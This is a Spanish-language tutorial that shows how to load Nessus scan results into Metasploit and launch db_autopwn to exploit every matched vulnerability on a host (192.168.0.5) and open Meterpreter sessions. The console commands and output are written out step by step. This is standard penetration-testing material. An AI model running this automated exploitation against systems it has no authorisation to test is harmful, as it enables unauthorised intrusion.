Shell Root

Ahora en este tutorial, explicaré como pasar los resultados que nos arrojo el scaner Nessus al Metasploit. Porque hacer esto? Bueno, tendremos la informacion ordenada y lista para poner en ejecución el comando db_autopwn, que es el que se encarga de explotar las vulnerabilidas encontradas con el Scaner, automaticamente. Empecemos!

Inicializamos la consola del Metasploit
Código:
shell@ShellRoot:~/msf3$ ./msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##


=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf >


Despues de haber escaneado la Dirección IP con el scanner Nessus exportamos el resultado dentro de un archivo con extensión .nbe, depues dentro del metasploit crearemos una base de datos con los datos que estan dentro del archivo de Nessus. Asi:
Código:
msf > db_destroy[*] Deleting /home/shell/.msf3/sqlite3.db...
msf > db_create[*] Creating a new database instance...[*] Successfully connected to the database[*] File: /home/shell/.msf3/sqlite3.db
msf >

Miramos que comandos podemos usar
Código:
msf > help

Database Backend Commands
=========================

Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_note Add a note to host
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_connect Connect to an existing database
db_create Create a brand new database
db_del_host Delete one or more hosts from the database
db_del_port Delete one port from the database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
db_hosts List all hosts in the database
db_import_amap_mlog Import a THC-Amap scan results file (-o -m)
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nessus_xml Import a Nessus scan result file (NESSUS)
db_import_nmap_xml Import a Nmap scan results file (-oX)
db_nmap Executes nmap and records the output automatically
db_notes List all notes in the database
db_services List all services in the database
db_vulns List all vulnerabilities in the database
db_workspace Switch between database workspaces


Importamos el archivo así:
Código:
msf > db_import_nessus_nbe /home/shell/192.168.0.5.nbe

Para mirar los Host escaneados, ejecutamos este comando:
Código:
msf > db_hosts

Hosts
=====

address address6 arch comm created info mac name os_flavor os_lang os_name os_sp state Svcs Vulns Workspace
------- -------- ---- ---- ------- ---- --- ---- --------- ------- ------- ----- ----- ---- ----- ---------
192.168.0.5 Fri Jan 01 19:22:13 -0500 2010 alive 10 14 default

msf >

Para mirar los servicios que estan corriendo, ejecutamos este comando:
Código:
msf > db_services

Services
========

created info name port proto state Host Workspace
------- ---- ---- ---- ----- ----- ---- ---------
Fri Jan 01 19:22:14 -0500 2010 smtp 25 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 http 80 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 epmap 135 tcp up 192.168.0.5 default
Fri Jan 01 19:22:13 -0500 2010 netbios-ns 137 udp up 192.168.0.5 default
Fri Jan 01 19:22:13 -0500 2010 netbios-ssn 139 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 https 443 tcp up 192.168.0.5 default
Fri Jan 01 19:22:13 -0500 2010 microsoft-ds 445 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 blackjack 1025 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 ms-wbt-server 3389 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 Elite 31337 tcp up 192.168.0.5 default

msf >

Para mirar las vulnerabilidades encontradas, ejecutamos este comando:
Código:
msf > db_vulns[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=139 proto=tcp name=NSS-11011 refs=[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-11011 refs=[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=137 proto=udp name=NSS-10150 refs=[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10394 refs=CVE-1999-0504,BID-494,CVE-2000-0222,CVE-1999-0505,BID-11199,CVE-1999-0506,BID-990,CVE-2005-3595,CVE-2002-1117[*] Time: Fri Jan 01 19:22:14 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10785 refs=[*] Time: Fri Jan 01 19:22:14 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-35362 refs=OSVDB-52691,OSVDB-52692,CVE-2008-4114,BID-33121,BID-33122,OSVDB-48153,CVE-2008-4834,BID-31179,CVE-2008-4835[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-26917 refs=[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10397 refs=OSVDB-300[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-26920 refs=BID-494,CVE-2002-1117[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=80 proto=tcp name=NSS-22964 refs=[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=25 proto=tcp name=NSS-22964 refs=[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=3389 proto=tcp name=NSS-10940 refs=[*] Time: Fri Jan 01 19:22:16 -0500 2010 Vuln: host=192.168.0.5 port=1025 proto=tcp name=NSS-22319 refs=[*] Time: Fri Jan 01 19:22:16 -0500 2010 Vuln: host=192.168.0.5 port=25 proto=tcp name=NSS-10263 refs=
msf >


Ahora estamos listos para la ejecucion del comando db_autopwn. Miremos que parametros tiene disponible para la ejecución. Miramos que parametros necesitamos para correr el comando db_autopwn
Código:
msf > db_autopwn[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex

msf >

Solo son necesarios los parametros -e -x. Esperamos que termine la ejecucion de los exploit y miramos las sessiones del Meterpreter.

By: Shell Root

__________________
.
.
.
.